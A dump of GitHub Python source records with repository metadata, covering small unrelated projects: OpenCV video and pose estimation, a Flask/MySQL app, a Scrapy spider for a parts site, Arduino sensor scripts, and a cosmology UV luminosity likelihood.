run_game()\n\n # print(generator(BOARD))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Ifeoluwa5983/Computerized-Tic-Tac-Toe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8520134764","text":"import numpy as np\nimport cv2\n\ncap = capture =cv2.VideoCapture('C2.mp4')\nwhile(cap.isOpened()):\n ret, frame = cap.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n cv2.imshow('frame',gray)\n cv2.waitKey(1)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"krishnakantkumar0/Simple-Python","sub_path":"40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4765803913","text":"import glob\nimport cv2\nimport random\nimport numpy as np\nimport os\nimport pickle\nfrom PIL import Image\nimport sys\nfrom threading import Thread, RLock\nfrom time import time\n\nrlock = RLock()\nclass OpenImage(Thread):\n \"\"\" Thread for open images. \"\"\"\n def __init__(self, listA):\n global data, imgSize\n Thread.__init__(self)\n self.listA = listA\n self.img, self.value, self.size = None, None, None\n\n def run(self):\n \"\"\" Code to execute to open. \"\"\"\n i = 0\n for elm in self.listA:\n self.value = int(elm.split('\\\\')[1].split('_')[0])\n if self.value == 0:\n self.img = np.array(cv2.resize(cv2.imread(elm, 0), (imgSize,imgSize)))\n with rlock:\n data.append([self.img, [-1,-1,-1,-1,-1]])\n else:\n self.img = np.array(cv2.resize(cv2.imread(elm, 0), (imgSize,imgSize)))\n splited = elm.split('\\\\')[1].split('_')\n self.size = [float(splited[2]),float(splited[3]),float(splited[4]) - float(splited[2]),float(splited[5][:-4]) - float(splited[3]),1.0]\n with rlock:\n data.append([self.img, self.size])\n\nliste = glob.glob('./image/**')\n\nrandom.shuffle(liste)\n#pourcentage d'exemples pour train le modèle\n#pourcentage pour le test 1 - split\nsplit = 0.90\nnbClass = 4\nimgSize = 64\n\ndata = []\n#Chargement en RAM des images trouvées\n# Threads Creation\nt1 = time()\nthreads = []\n\nnbThread = 20\nsize = int(len(liste)/nbThread)\nfor x in range(nbThread):\n threads.append(OpenImage(liste[x*size:(x+1)*size]))\n\n# Lancement des threads\nfor thread in threads:\n thread.start()\n\n\n# Attend que les threads se terminent\nfor thread in threads:\n thread.join()\n\nprint('len de data', len(data), time() - t1)\n\nprint('Chargement en RAM des images done ...')\n#Traitement des images pour l'entrainement du modèle\nX_train = []\ny_train = []\ndata_train = []\nfor elm in data[:int(len(data)*split)]:\n boundingBox = [elm[1][0], 1-elm[1][3], elm[1][2], 1-elm[1][1],elm[1][4]]\n data_train.append([np.flip(elm[0],1), boundingBox])\n data_train.append([elm[0], elm[1]])\n\nprint('Traitement data_train done ...')\n#Traitement des images pour le test du modèle\nX_test = []\ny_test = []\ndata_test = []\nfor elm in data[int(len(data)*split):]:\n boundingBox = [elm[1][0], 1-elm[1][3], elm[1][2], 1-elm[1][1],elm[1][4]]\n data_test.append([np.flip(elm[0],1), boundingBox])\n data_test.append([elm[0], elm[1]])\n\nprint('Traitement data_test done ...')\ndata = 0\nrandom.shuffle(data_test)\nrandom.shuffle(data_train)\n\n\nfor elm in data_train:\n X_train.append(elm[0])\n y_train.append(elm[1])\ndata_train = 0\n\nfor elm in data_test:\n X_test.append(elm[0])\n y_test.append(elm[1])\ndata_test = 0\n\nX_train, y_train, X_test, y_test = np.array(X_train), np.array(y_train), np.array(X_test), np.array(y_test)\nprint('Ready to dump')\n\nsave_dir = './dataTrain/'\nif not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n\n\nnp.save('./dataTrain/Xtest_0', X_test)\nprint(\"Nombres exemples de test\", len(X_test))\nX_test = 0\nnp.save('./dataTrain/Ytest_0', y_test)\ny_test = 0\n\nnp.save('./dataTrain/Ytrain_0', y_train)\ny_train = 0\nnp.save('./dataTrain/Xtrain_0', X_train)\nprint(\"Nombres exemples d'entrainement\", len(X_train))\nX_train = 0\n\n\n\n\n\n","repo_name":"llecorguille/BoundingBoxDetection","sub_path":"dataPickle.py","file_name":"dataPickle.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5201339129","text":"'''\nCreated on Oct 6, 2015\n\n@author: dipkumar.patel\n'''\n\nimport pyttsx\n\ndef text_speech(text):\n engine = pyttsx.init()\n engine.setProperty('rate', 150)\n voice=pyttsx.voice.Voice\n voice.id= 0x0000000002CC9550\n engine.setProperty('voice', voice.id)\n s=text\n engine.say(s)\n engine.runAndWait()","repo_name":"kushrami/windows_automation","sub_path":"windows_automation/Text2speech/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"934138389","text":"from flask import Flask, render_template, url_for, redirect\r\nfrom flask_bootstrap import Bootstrap\r\n#from flaskext.mysql import MySQL\r\nfrom flask_mysqldb import MySQL\r\nimport yaml\r\n\r\napp = Flask(__name__)\r\n\r\nbootstrap = Bootstrap(app)\r\n\r\n\r\n\r\n# configure db\r\ndb = yaml.load(open('db.yaml'))\r\napp.config['MYSQL_HOST'] = db['mysql_host']\r\napp.config['MYSQL_USER'] = db['mysql_user']\r\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\r\napp.config['MYSQL_DB'] = db['mysql_db']\r\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\r\n\r\nmysql = MySQL(app)\r\n#mysql.init_app(app)\r\n#print(db)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n cur = mysql.connection.cursor()\r\n #cur.execute('''CREATE TABLE example (id INTEGER, name VARCHAR(20))''')\r\n #cur.execute('''INSERT INTO example VALUES(1,'Morenikeji')''')\r\n #cur.execute('''INSERT INTO example VALUES(2,'Ayomide')''')\r\n \r\n if cur.execute('''INSERT INTO example VALUES (3, 'Motune')'''):\r\n mysql.connection.commit() \r\n return 'success', 201\r\n #users = cur.fetchall()\r\n #print(users)\r\n #return 'Done!'\r\n #return users[0]['name']\r\n return render_template('index.html')\r\n #fruits = ['Apple', 'Mango', 'Orange']\r\n #return render_template('index.html',fruits=fruits)\r\n #return redirect(url_for('about'))\r\n\r\n\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n\r\n@app.route('/css')\r\ndef css():\r\n return render_template('css.html')\r\n\r\n\r\n@app.errorhandler(404)\r\ndef page_not_found(e):\r\n return 'This page was not found!'\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"motunrayokoyejo/Learn-Flask","sub_path":"first_flask_practice/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"11377342469","text":"from pyfirmata import Arduino, util\nimport time\n\nboard = Arduino('/dev/cu.usbmodem1411')\necho_pin = board.get_pin('d:7:i')\ntrig_pin = board.get_pin('d:8:o')\n\n\n\n\nwhile True:\n it = util.Iterator(board)\n it.start()\n trig_pin.write(False)\n time.sleep(1)\n trig_pin.write(True)\n time.sleep(1)\n \n value = digital_9.read()\n print(value)\n","repo_name":"chloeleichen/python","sub_path":"firmata/ultrasonic.py","file_name":"ultrasonic.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36160218408","text":"\"\"\"\nPyDraw 线程:使用线程来移动对象,Windows系统上正常运行,条件是 canvas.update()\n没有被其它线程使用(否则会随着致命错误而退出,一些对象在画出后就开始立即移动等);\n至少一些画布方法调用在 tkinter 中的肯定是安全线程;它不如 time.sleep 平稳,总\n之时很危险的,线程是最后的编码,以便更新全局变量,而不改变 GUI。\n\"\"\"\n\nimport sys\nimport random\nimport time\nimport _thread as thread\nfrom tkinter import Tk, mainloop\nfrom movingpics import MovingPics, pickUnits, pickDelays\n\n\nclass MovingPicsThreaded(MovingPics):\n def __init__(self, parent=None):\n MovingPics.__init__(self, parent)\n self.mutex = thread.allocate_lock()\n # sys.setcheckinterval(0) # 在每个 vm 操作后切换:没有帮助\n\n def onMove(self, event):\n object = self.object\n if object and object not in self.moving:\n msecs = int(pickDelays[0] * 1000)\n parms = 'Delay=%d msec, Units=%d' % (msecs, pickUnits[0])\n self.setTextInfo(parms)\n # self.mutex.acquire()\n self.moving.append(object)\n # self.mutex.release()\n incrX, reptX, incrY, reptY = self.plotMoves(event)\n thread.start_new_thread(self.doMove, (object, event))\n\n def doMove(self, object, event):\n canvas = event.widget\n incrX, reptX, incrY, reptY = self.plotMoves(event)\n for i in range(reptX):\n canvas.move(object, incrX, 0)\n # canvas.update()\n time.sleep(pickDelays[0]) # 这个可以变更\n for i in range(reptY):\n canvas.move(object, 0, incrY)\n # canvas.update() # 更新运行其它应用程序\n time.sleep(pickDelays[0]) # 休眠直至下次移动\n # self.mutex.acquire()\n self.moving.remove(object)\n if self.object == object:\n self.where = event\n # self.mutex.release()\n\nif __name__ == '__main__':\n root = Tk()\n MovingPicsThreaded(root)\n root.mainloop()\n","repo_name":"romanticair/python","sub_path":"basis/progr-py/Gui/MovingPics/movingpics_threads.py","file_name":"movingpics_threads.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24085063868","text":"import scrapy\nfrom ICHQWpro.mysql.mysql_utils.mysql_conf import MySQLS\nfrom ICHQWpro.mysql.mysql_utils.mysql_conn import MysqlPooledDB\n\n\nclass IchqSpider(scrapy.Spider):\n name = 'ichq'\n # allowed_domains = ['www.xx.com']\n # start_urls = ['https://ibsv3.hqew.com/']\n\n def get_data(self):\n sql = \"\"\"\n select model from szlc GROUP BY model;\n \"\"\"\n self.conn, self.cursor = MysqlPooledDB(MySQLS['me']).connect()\n self.cursor.execute(sql)\n data = self.cursor.fetchall()\n return data\n\n def start_requests(self):\n word_list = self.get_data()\n for word in word_list:\n word = word['model']\n url = 'https://s.hqew.com/' + word + '.html'\n yield scrapy.Request(\n url=url,\n callback=self.parse\n )\n\n def parse(self, response,**kwargs):\n tr_list = response.xpath('//div[@id=\"resultList\"]/div/table/tbody/tr[contains(@sid,\"s\")]')\n if tr_list:\n for tr in tr_list:\n item = {}\n item['com_name'] = tr.xpath('./td[@class=\"j-company-td\"]/p/a/@cname').extract_first()\n item['com_name_url'] = tr.xpath('./td[@class=\"j-company-td\"]/p/a/@href').extract_first()\n item['model'] = tr.xpath('./td[@class=\"td-model\"]/div/a[1]/text()').extract_first()\n item['amount'] = tr.xpath('./td[@class=\"td-stockNum\"]/p[1]/text()').extract_first()\n item['brand'] = tr.xpath('./td[@class=\"td-brand\"]/div/@title').extract_first()\n item['batch_num'] = tr.xpath('./td[8]/p/text()').extract_first()\n item['package'] = tr.xpath('./td[9]/p/text()').extract_first()\n item['parameter'] = tr.xpath('./td[@class=\"td-param\"]/div/@title').extract_first()\n item['depot'] = tr.xpath('./td[last()-2]/p/text()').extract_first()\n item['desc_ic'] = tr.xpath('./td[last()-1]/div/@title').extract_first()\n yield item\n\n # 翻页\n next_url = response.xpath('//a[text()=\"下一页\"]/@href').extract_first()\n if next_url:\n next_url = response.urljoin(next_url)\n yield scrapy.Request(\n url=next_url,\n callback=self.parse\n )\n else:\n print('查无结果')","repo_name":"Tao00612/ICHQWpro","sub_path":"ICHQWpro/spiders/ichq.py","file_name":"ichq.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38120502108","text":"#!/usr/bin/env python\n# Resets an Arduino Leonardo connected at 'serialPort' (specified\n# on the command line) to prepare it for a firmware update\n\nimport serial, sys\nserialPort = sys.argv[1]\nser = serial.Serial(\n port=serialPort,\n baudrate=1200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS\n)\nser.isOpen()\nser.close()\n","repo_name":"menczel/avrhid","sub_path":"reset_board.py","file_name":"reset_board.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"15828353665","text":"########################################################################\n# Written by Nashwan Sabti - 2021\n# Please cite 2110.XXXX and 2110.XXXX when using this likelihood\n########################################################################\n\nfrom likelihood_class import Likelihood\n\nimport numpy as np\nfrom scipy.interpolate import PchipInterpolator\nfrom scipy.integrate import simps\nfrom scipy.special import erf\n\nclass UVLF_HST_ST_model1_powerspectrum(Likelihood):\n\n def __init__(self, path, data, command_line):\n\n Likelihood.__init__(self, path, data, command_line)\n\n # Define order of Gaussian quadrature integration\n self.points, self.weights = np.polynomial.legendre.leggauss(25)\n self.points_highres, self.weights_highres = np.polynomial.legendre.leggauss(1000)\n \n # Import HST UV LF data and impose 20% minimal error\n minError = 0.2\n self.UVLF_HST = np.loadtxt(data.path[\"data\"]+\"/UVLF/UVLF_HST.txt\")\n self.UVLF_HST[:,4] = np.array(list(map(max,zip(minError*self.UVLF_HST[:,3], self.UVLF_HST[:,4]))))\n self.zs = np.unique(self.UVLF_HST[:,0])\n\n # Beta functions for the dust correction\n betadata = np.loadtxt(data.path[\"data\"]+\"/UVLF/Beta_parameters.txt\", unpack=True)\n self.betainterp = PchipInterpolator(betadata[0], betadata[1])\n self.dbetadMUVinterp = PchipInterpolator(betadata[0], betadata[2])\n\n # Undusting the data\n dust_corr = []\n bin_corr = []\n LF_corr = []\n for item in self.UVLF_HST:\n z, MUV, bin_width = item[0], item[1], item[2]\n new_bin_width = bin_width - self.AUV(z, MUV + bin_width/2) + self.AUV(z, MUV - bin_width/2)\n dust_corr.append(self.AUV(z, MUV))\n bin_corr.append(new_bin_width)\n LF_corr.append(bin_width / new_bin_width)\n\n self.UVLF_HST[:,1] -= np.array(dust_corr)\n self.UVLF_HST[:,2] = np.array(bin_corr)\n self.UVLF_HST[:,3] *= np.array(LF_corr)\n self.UVLF_HST[:,4] *= np.array(LF_corr)\n\n # Halo masses which we integrate over\n self.Mhalos = np.geomspace(1e8, 1e14, 1000)\n\n return\n\n # Beta function for the dust extinction\n def betaAverage(self, z, MUV):\n if MUV < -19.5:\n return self.dbetadMUVinterp(z) * (MUV + 19.5) + self.betainterp(z)\n return (self.betainterp(z) + 2.33) * np.exp((self.dbetadMUVinterp(z) * (MUV + 19.5)) / (self.betainterp(z) + 2.33)) - 2.33\n\n # Dust extinction parameter (only applied at redshifts for which the beta function is measured)\n def AUV(self, z, MUV):\n if z < 2.5 or z > 8:\n return 0.\n\n sigmabeta = 0.34\n return max(0., 4.54 + 0.2 * np.log(10) * (2.07**2) * (sigmabeta**2) + 2.07 * self.betaAverage(z, MUV)) # Overzier 2011\n # return max(0., 4.43 + 0.2 * np.log(10) * (1.99**2) * (sigmabeta**2) + 1.99 * self.betaAverage(z, MUV)) # Meurer 1999\n # return max(0., 3.36 + 0.2 * np.log(10) * (2.04**2) * (sigmabeta**2) + 2.04 * self.betaAverage(z, MUV)) # Casey 2014\n # return max(0., 2.45 + 0.2 * np.log(10) * (1.1**2) * (sigmabeta**2) + 1.1 * self.betaAverage(z, MUV)) # Bouwens 2016\n\n # Comoving radial distance\n def rcomoving(self, z, Omega_m, h):\n return self.c * self.integrator(lambda x: 1/np.sqrt(Omega_m * np.power(1 + x,3) + 1. - Omega_m), 0., z) / (100. * h)\n\n # Gaussian integrator\n def integrator(self, f, a, b, highres=False):\n sub = (b - a) / 2.\n add = (b + a) / 2.\n if sub == 0:\n return 0.\n if not highres:\n return sub * np.dot(f(sub * self.points + add), self.weights)\n return sub * np.dot(f(sub * self.points_highres + add), self.weights_highres)\n\n # Alcock-Paczynski corrections\n def AP_effect(self, data):\n deltaz = 0.5 # 1/2 width of redshift slice\n Omega_m = data.mcmc_parameters['Omega_m']['current']\n hubble = data.mcmc_parameters['h']['current']\n\n self.UVLF_data = self.UVLF_HST.copy()\n for z in self.zs:\n # Vratio is the correction to the UV LF\n Vratio = (np.power(self.rcomoving(z+deltaz, self.Omega_m_HST, self.h_HST),3) - np.power(self.rcomoving(z-deltaz, self.Omega_m_HST, self.h_HST),3)) / (np.power(self.rcomoving(z+deltaz, Omega_m, hubble),3) - np.power(self.rcomoving(z-deltaz, Omega_m, hubble),3))\n\n # Apply correction to UV LF and error\n self.UVLF_data[self.UVLF_data[:,0]==z,3:] *= Vratio\n\n # Apply correction to magntiudes, since luminosity distances are affected too\n self.UVLF_data[self.UVLF_data[:,0]==z,1] = self.UVLF_data[self.UVLF_data[:,0]==z,1] - 5. * np.log10(self.rcomoving(z, Omega_m, hubble) / self.rcomoving(z, self.Omega_m_HST, self.h_HST))\n\n # The multiplication factor of the power spectrum in each bin\n def scaling(self, k, as2, as3, as4):\n k1 = 0.5\n k2 = 2.25\n k3 = 10.\n if k < k1:\n return 1.\n if k >= k1 and k <= k2:\n return as2\n if k > k2 and k <= k3:\n return as3\n return as4\n\n # Calculate the mass variance manually intead from CLASS\n def calculate_sigma(self, R, kmin, kmax, pk, z, as2, as3, as4):\n mps = np.vectorize(lambda y: pk(y, z) * self.scaling(y, as2, as3, as4))\n window = lambda x: np.heaviside(1. - x * R, 1.)\n return np.sqrt(self.integrator(lambda x: window(x)**2 * mps(x) * x**2, kmin, kmax, True) / 2. / np.pi**2)\n\n # Compute the HMF and average <MUV> given halo mass Mh. This is done in one function in order not to compute \"sigma\" again, which takes a long time here\n def HMF_and_MUV_from_Mh(self, cosmo, data, z, Mh, ks):\n rhoM = np.power(data.mcmc_parameters['h']['current'], 2) * data.mcmc_parameters['Omega_m']['current'] * self.rho_crit\n aST = data.mcmc_parameters['aST']['current']\n As2 = 10**data.mcmc_parameters['logas2']['current']\n As3 = 10**data.mcmc_parameters['logas3']['current']\n As4 = 10**data.mcmc_parameters['logas4']['current']\n\n R = np.power(3. * Mh / (4. * np.pi * rhoM), 1./3) / self.cM\n sigma = self.calculate_sigma(R, min(ks), max(ks), cosmo.pk_cb_lin, z, As2, As3, As4)\n dsigmadM = -cosmo.pk_cb_lin(1/R, z) * self.scaling(1/R, As2, As3, As4) / 12. / np.pi**2 / R**3 / Mh / sigma\n\n #################\n\n alphastar = data.mcmc_parameters['alphastar']['current']\n betastar = data.mcmc_parameters['betastar']['current']\n epsilonstar = 10**(data.mcmc_parameters['epsilonstar_slope']['current'] * np.log10((1 + z)/(1 + 6)) + data.mcmc_parameters['epsilonstar_icept']['current'])\n Mc = 10**(data.mcmc_parameters['Mc_slope']['current'] * np.log10((1 + z)/(1 + 6)) + data.mcmc_parameters['Mc_icept']['current'])\n\n Q = data.mcmc_parameters['Q']['current']\n sigma1 = self.calculate_sigma(np.power(3. * Mh / Q / (4. * np.pi * rhoM), 1./3) / self.cM, min(ks), max(ks), cosmo.pk_cb_lin, z, As2, As3, As4)\n functionf = 1./np.sqrt(sigma1**2 - sigma**2)\n dgrowthdz = -cosmo.scale_independent_growth_factor_f(z) * cosmo.scale_independent_growth_factor(z) / (1.+z)\n Mhdot = -(1+z) * cosmo.Hubble(z) * self.invMpctoinvYear * 1.686 * np.sqrt(2./np.pi) * Mh * functionf * dgrowthdz / cosmo.scale_independent_growth_factor(z)**2\n\n return -self.AST * np.sqrt(2. * aST / np.pi) * (1. + np.power(np.power(sigma,2) / (aST * np.power(self.deltaST, 2)), self.pST)) * (self.deltaST / sigma) * np.exp(-aST * np.power(self.deltaST, 2) / (2. * np.power(sigma, 2))) * (rhoM / (Mh * sigma)) * dsigmadM, -2.5 * np.log10(epsilonstar * Mhdot / ((Mh/Mc)**alphastar + (Mh/Mc)**betastar) / self.kappaUV) + 51.63\n\n # Integrated Gaussian distribution for given average magnitude\n def first_integrand(self, MUV, width, MUV_av, sigma_MUV):\n return 0.5 * (erf((MUV_av-MUV+width/2.) / (sigma_MUV*np.sqrt(2))) - erf((MUV_av-MUV-width/2.) / (sigma_MUV*np.sqrt(2))))\n\n # Log-likelihood\n def loglkl(self, cosmo, data):\n \n # Compute AP effect\n self.AP_effect(data)\n\n chisq = 0\n # Iterate over redshifts of data\n for z in self.zs:\n\n # Array of wavenumbers \n ks = cosmo.get_transfer(z)[\"k (h/Mpc)\"] * data.mcmc_parameters['h']['current']\n\n # HMFs and average MUVs only need to be computed at each redshift slice\n HMF_and_MUV_from_Mh = np.array([self.HMF_and_MUV_from_Mh(cosmo, data, z, mass, ks) for mass in self.Mhalos])\n HMFs = HMF_and_MUV_from_Mh[:, 0]\n MUV_avs = HMF_and_MUV_from_Mh[:, 1]\n\n # Iterate over data at redshift z\n for item in self.UVLF_data[self.UVLF_data[:,0]==z,1:]:\n MUV, width, UVLF_data, UVLF_error = item\n second_integrand = HMFs * self.first_integrand(MUV, width, MUV_avs, data.mcmc_parameters['sigma_MUV']['current']) / width\n chisq += ((simps(second_integrand, self.Mhalos) - UVLF_data) / UVLF_error)**2\n\n return -0.5 * chisq\n","repo_name":"NNSSA/GALLUMI_public","sub_path":"MontePython_files/Likelihoods/UVLF_HST_ST_model1_powerspectrum/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9032,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"41987148307","text":"##Author: Aamir Bader Shah\r\n##This code performs feature extraction from the reference images and then compare it to each frame of the video and identify / annotate the angles\r\n\r\nimport argparse\r\nimport cv2\r\nimport numpy as np\r\nimport math\r\nimport os\r\nfrom objloader_simple import *\r\n\r\n# Minimum number of matches that have to be found\r\n# to consider the recognition valid\r\nMIN_MATCHES = 160\r\nDEFAULT_COLOR = (0, 0, 0)\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n This functions loads the target surface image,\r\n \"\"\"\r\n \r\n homography = None \r\n # matrix of camera parameters (made up but works quite well for me) \r\n camera_parameters = np.array([[800, 0, 320], [0, 800, 240], [0, 0, 1]])\r\n # create ORB keypoint detector\r\n orb = cv2.ORB_create()\r\n # create BFMatcher object based on hamming distance \r\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\r\n # load the reference surface that will be searched in the video stream\r\n dir_name = os.getcwd()\r\n print(dir_name)\r\n\r\n # Load 3D model from OBJ file\r\n obj = OBJ(os.path.join(dir_name, 'models/fox.obj'), swapyz=True)\r\n directory = r'/homelocal/images/70_6273_14178_1/images/'\r\n \r\n # init video capture\r\n #cap = cv2.VideoCapture(2)\r\n loop=0\r\n loop_2=0\r\n angle=0\r\n cap=cv2.VideoCapture(\"/homelocal/videos/bowls_fast.mp4\")\r\n frame_width = int(cap.get(3))\r\n frame_height = int(cap.get(4))\r\n \r\n size = (frame_width, frame_height)\r\n result = cv2.VideoWriter('filename.avi', cv2.VideoWriter_fourcc(*'MJPG'), 10, size)\r\n thisdict={}\r\n for filename in sorted(os.listdir(directory)):\r\n #creating a dictionary for all filenames w.r.t angles\r\n \r\n angle=angle+45\r\n thisdict[filename] = {\r\n filename : angle\r\n }\r\n \r\n while True:\r\n \r\n for filename in sorted(os.listdir(directory)): \r\n\r\n # read the current frame\r\n ret, frame = cap.read()\r\n #count the number of times the loop has iterated within the files\r\n loop=loop+1\r\n print(\"Loop 1: \", loop)\r\n if not ret:\r\n print(\"Unable to capture video\")\r\n return \r\n if ret == True: \r\n # Write the frame into the\r\n # file 'filename.avi'\r\n result.write(frame)\r\n # if all the files have been iterated, set the loop counts to 0. \r\n if loop == len(os.listdir(directory)):\r\n loop=0\r\n loop_2=0\r\n # find and draw the keypoints of the frame\r\n kp_frame, des_frame = orb.detectAndCompute(frame, None)\r\n # match frame descriptors with model descriptors\r\n model = cv2.imread(os.path.join(directory, filename), 0)\r\n \r\n # Compute model keypoints and its descriptors\r\n kp_model, des_model = orb.detectAndCompute(model, None)\r\n matches = bf.match(des_model, des_frame)\r\n # sort them in the order of their distance\r\n # the lower the distance, the better the match\r\n matches = sorted(matches, key=lambda x: x.distance)\r\n \r\n \r\n print(\"No. of Matches Found: \", len(matches))\r\n print(\"Total No. of Matches\", MIN_MATCHES)\r\n #if instance is found we go to next step, otherwise go to next file\r\n if len(matches) > MIN_MATCHES:\r\n print(\"break - Filename\", filename)\r\n loop_2=0\r\n break\r\n elif len(matches) <= MIN_MATCHES or loop_2 < len(os.listdir(directory)):\r\n #count the number of times, the loop has not found an instance\r\n print(\"continue Filename\", filename)\r\n loop_2=loop_2+1\r\n print(\"Loop 2:\", loop_2)\r\n \r\n continue\r\n # Putting angle text on video\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n cv2.putText(frame, str(thisdict[filename]), (50, 50), font, 1, (0, 255, 255), 2, cv2.LINE_4)\r\n \r\n # compute Homography if enough matches are found\r\n if len(matches) > MIN_MATCHES:\r\n print('we are here !!!')\r\n # differenciate between source points and destination points\r\n src_pts = np.float32([kp_model[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)\r\n dst_pts = np.float32([kp_frame[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)\r\n # compute Homography\r\n homography, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\r\n if args.rectangle:\r\n # Draw a rectangle that marks the found model in the frame\r\n h, w = model.shape\r\n pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)\r\n # project corners into frame\r\n dst = cv2.perspectiveTransform(pts, homography)\r\n # connect them with lines \r\n frame = cv2.polylines(frame, [np.int32(dst)], True, 255, 3, cv2.LINE_AA) \r\n # if a valid homography matrix was found render cube on model plane\r\n if homography is not None:\r\n try:\r\n # obtain 3D projection matrix from homography matrix and camera parameters\r\n projection = projection_matrix(camera_parameters, homography) \r\n # project cube or model\r\n frame = render(frame, obj, projection, model, False)\r\n #frame = render(frame, model, projection)\r\n except:\r\n pass\r\n # draw first 10 matches.\r\n if args.matches:\r\n frame = cv2.drawMatches(model, kp_model, frame, kp_frame, matches[:10], 0, flags=2)\r\n \r\n \r\n \r\n # show result\r\n frame = cv2.resize(frame, (540,540))\r\n #cv2.imshow('frame', frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n else:\r\n print(\"Not enough matches found - %d/%d\" % (len(matches), MIN_MATCHES))\r\n\r\n \r\n \r\n cap.release()\r\n cv2.destroyAllWindows()\r\n return 0\r\n\r\n \r\n\r\ndef render(img, obj, projection, model, color=False):\r\n \"\"\"\r\n Render a loaded obj model into the current video frame\r\n \"\"\"\r\n vertices = obj.vertices\r\n scale_matrix = np.eye(3) * 3\r\n h, w = model.shape\r\n print(\"This is image\", cv2.imshow('img', img))\r\n for face in obj.faces:\r\n face_vertices = face[0]\r\n points = np.array([vertices[vertex - 1] for vertex in face_vertices])\r\n points = np.dot(points, scale_matrix)\r\n # render model in the middle of the reference surface. To do so,\r\n # model points must be displaced\r\n points = np.array([[p[0] + w / 2, p[1] + h / 2, p[2]] for p in points])\r\n dst = cv2.perspectiveTransform(points.reshape(-1, 1, 3), projection)\r\n imgpts = np.int32(dst)\r\n if color is False:\r\n cv2.fillConvexPoly(img, imgpts, DEFAULT_COLOR)\r\n else:\r\n color = hex_to_rgb(face[-1])\r\n color = color[::-1] # reverse\r\n cv2.fillConvexPoly(img, imgpts, color)\r\n\r\n return img\r\n\r\ndef projection_matrix(camera_parameters, homography):\r\n \"\"\"\r\n From the camera calibration matrix and the estimated homography\r\n compute the 3D projection matrix\r\n \"\"\"\r\n # Compute rotation along the x and y axis as well as the translation\r\n homography = homography * (-1)\r\n rot_and_transl = np.dot(np.linalg.inv(camera_parameters), homography)\r\n col_1 = rot_and_transl[:, 0]\r\n col_2 = rot_and_transl[:, 1]\r\n col_3 = rot_and_transl[:, 2]\r\n # normalise vectors\r\n l = math.sqrt(np.linalg.norm(col_1, 2) * np.linalg.norm(col_2, 2))\r\n rot_1 = col_1 / l\r\n rot_2 = col_2 / l\r\n translation = col_3 / l\r\n # compute the orthonormal basis\r\n c = rot_1 + rot_2\r\n p = np.cross(rot_1, rot_2)\r\n d = np.cross(c, p)\r\n rot_1 = np.dot(c / np.linalg.norm(c, 2) + d / np.linalg.norm(d, 2), 1 / math.sqrt(2))\r\n rot_2 = np.dot(c / np.linalg.norm(c, 2) - d / np.linalg.norm(d, 2), 1 / math.sqrt(2))\r\n rot_3 = np.cross(rot_1, rot_2)\r\n # finally, compute the 3D projection matrix from the model to the current frame\r\n projection = np.stack((rot_1, rot_2, rot_3, translation)).T\r\n return np.dot(camera_parameters, projection)\r\n\r\ndef hex_to_rgb(hex_color):\r\n \"\"\"\r\n Helper function to convert hex strings to RGB\r\n \"\"\"\r\n hex_color = hex_color.lstrip('#')\r\n h_len = len(hex_color)\r\n return tuple(int(hex_color[i:i + h_len // 3], 16) for i in range(0, h_len, h_len // 3))\r\n\r\n\r\n# Command line argument parsing\r\n# NOT ALL OF THEM ARE SUPPORTED YET\r\nparser = argparse.ArgumentParser(description='Pose Estimation')\r\n\r\nparser.add_argument('-r','--rectangle', help = 'draw rectangle delimiting target surface on frame', action = 'store_true')\r\nparser.add_argument('-mk','--model_keypoints', help = 'draw model keypoints', action = 'store_true')\r\nparser.add_argument('-fk','--frame_keypoints', help = 'draw frame keypoints', action = 'store_true')\r\nparser.add_argument('-ma','--matches', help = 'draw matches between keypoints', action = 'store_true')\r\n# TODO jgallostraa -> add support for model specification\r\n#parser.add_argument('-mo','--model', help = 'Specify model to be projected', action = 'store_true')\r\n\r\nargs = parser.parse_args()\r\n\r\nif __name__ 